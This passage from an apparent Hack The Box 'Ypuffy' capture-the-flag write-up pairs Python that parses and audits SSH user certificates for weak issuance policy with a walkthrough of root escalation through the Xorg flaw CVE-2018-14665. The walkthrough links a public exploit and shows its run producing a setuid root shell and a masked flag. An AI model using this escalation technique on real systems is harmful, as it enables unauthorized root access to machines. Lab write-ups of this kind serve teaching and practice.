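    """Sequential decoder for SSH wire-format fields."""
    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def string(self) -> bytes:
        (n,) = struct.unpack(">I", self.data[self.pos:self.pos + 4])
        self.pos += 4 + n
        return self.data[self.pos - n:self.pos]

    def u32(self) -> int:
        self.pos += 4
        return struct.unpack(">I", self.data[self.pos - 4:self.pos])[0]

    def u64(self) -> int:
        self.pos += 8
        return struct.unpack(">Q", self.data[self.pos - 8:self.pos])[0]

    def done(self) -> bool:
        return self.pos >= len(self.data)


def pack_options(opts: Sequence[Tuple[str, str]]) -> bytes:
    """Critical options / extensions: name, then a string holding the string-wrapped value (empty for flags)."""
    return s(b"".join(s(k.encode()) + s(s(v.encode()) if v else b"") for k, v in opts))


def unpack_options(blob: bytes) -> Dict[str, str]:
    r, out = Reader(blob), {}
    while not r.done():
        name, data = r.string().decode(), r.string()
        out[name] = Reader(data).string().decode() if data else ""
    return out


def build_user_cert(key_id: str, principals: Sequence[str], serial: int = 0, valid_after: int = 0,
                    valid_before: int = FOREVER, critical: Sequence[Tuple[str, str]] = (),
                    extensions: Sequence[Tuple[str, str]] = (("permit-pty", ""),)) -> str:
    """Produce an authorized_keys-style certificate line with placeholder key/signature bytes."""
    fake_e, fake_n = b"\x01\x00\x01", b"\x00\xab" * 64           # constructed, not a real key
    body = (s(CERT_TYPE.encode()) + s(b"\x00" * 32) + s(fake_e) + s(fake_n)   # type, nonce, e, n
            + struct.pack(">Q", serial) + struct.pack(">I", USER_CERT) + s(key_id.encode())
            + s(b"".join(s(p.encode()) for p in principals))
            + struct.pack(">Q", valid_after) + struct.pack(">Q", valid_before)
            + pack_options(critical) + pack_options(extensions) + s(b"")     # ... reserved
            + s(s(b"ssh-rsa") + s(fake_e) + s(b"\x00\xcd" * 64))             # CA public key (placeholder)
            + s(s(b"rsa-sha2-512") + s(b"\x00" * 64)))                       # signature (placeholder)
    return f"{CERT_TYPE} {base64.b64encode(body).decode()} {key_id}"


def parse_user_cert(line: str) -> Dict:
    """Decode the fields ssh-keygen -L prints; the signature is not verified here."""
    r = Reader(base64.b64decode(line.split()[1]))
    if r.string().decode() != CERT_TYPE:
        raise ValueError("not an ssh-rsa-cert-v01 certificate")
    r.string()                      # nonce
    r.string()                      # e
    r.string()                      # n
    cert = {"serial": r.u64(), "type": r.u32(), "key_id": r.string().decode()}
    principals, pr = [], Reader(r.string())
    while not pr.done():
        principals.append(pr.string().decode())
    cert["principals"] = principals
    cert["valid_after"], cert["valid_before"] = r.u64(), r.u64()
    cert["critical"] = unpack_options(r.string())
    cert["extensions"] = unpack_options(r.string())
    r.string()                      # reserved
    cert["ca_key_type"] = Reader(r.string()).string().decode()
    return cert


def audit(cert: Dict) -> List[str]:
    """Policy checks a CA operator would want on every issued certificate."""
    issues = []
    if cert["type"] != USER_CERT:
        issues.append("not a user certificate")
    if cert["valid_before"] == FOREVER:
        issues.append("no expiry (valid forever)")
    elif cert["valid_before"] <= cert["valid_after"]:
        issues.append("empty validity window")
    if cert["serial"] == 0:
        issues.append("serial 0: a KRL cannot revoke it by serial number")
    if not cert["principals"]:
        issues.append("empty principal list: valid for any principal")
    if "source-address" not in cert["critical"]:
        issues.append("no source-address restriction")
    return issues


if __name__ == "__main__":
    cert = parse_user_cert(build_user_cert("root", ["3m3rgencyB4ckd00r"]))
    print(cert["key_id"], cert["principals"], cert["serial"], hex(cert["valid_before"]))
    print("\n".join(audit(cert)))
```

Fed a real `*-cert.pub` line, `parse_user_cert` returns the same fields as `ssh-keygen -L`, which makes it easy to scan a collection of issued certificates for the pattern this box exhibits: serial 0, unbounded validity, and a principal that maps to root through AuthorizedPrincipalsCommand.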
On October 25th, 2018 (after the release of this box), a vulnerability affecting the Xorg server before 1.20.3 was disclosed. It allowed privilege escalation on OpenBSD 6.3 and 6.4 and was assigned CVE-2018-14665.
$ uname -a
OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64
Upload the following exploit to the server and run it to get root: https://www.exploit-db.com/exploits/45742.
ypuffy$ cd /tmp
ypuffy$ vi puckie.sh
ypuffy$ chmod +x puckie.sh
ypuffy$ ./puckie.sh
./puckie.sh[1]: it: not found

raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>

X.Org X Server 1.19.6
Release Date: 2017-12-20
X Protocol Version 11, Revision 0
Build Operating System: OpenBSD 6.3 amd64
Current Operating System: OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64
Build Date: 24 March 2018  02:38:24PM
Current version of pixman: 0.34.0
	Before reporting problems, check http://wiki.x.org
	to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
	(++) from command line, (!!) notice, (II) informational,
	(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "crontab", Time: Sun Feb 17 15:29:00 2019
(==) Using system config directory "/usr/X11R6/share/X11/xorg.conf.d"
(EE) Segmentation fault at address 0x8
(EE) Fatal server error:
(EE) Caught signal 11 (Segmentation fault). Server aborting
(EE)
(EE) Please consult the The X.Org Foundation support at http://wiki.x.org for help.
(EE) Please also check the log file at "crontab" for additional information.
(EE)
(EE) Server terminated with error (1). Closing log file.

Be patient for a couple of minutes...
Don't forget to cleanup and run crontab -e to reload the crontab.

-rw-r--r--  1 root  wheel  4813 Feb 17 15:29 /etc/crontab
-rw-r--r--  1 root  wheel  4814 Feb 14 16:00 /etc/crontab.old
-rwsrwxrwx  1 root  wheel  7257 Feb 17 15:31 /usr/local/bin/pwned
ypuffy#
ypuffy# whoami
root
ypuffy# cat /root/root.txt
126*****57f
Author : Jacco Straathof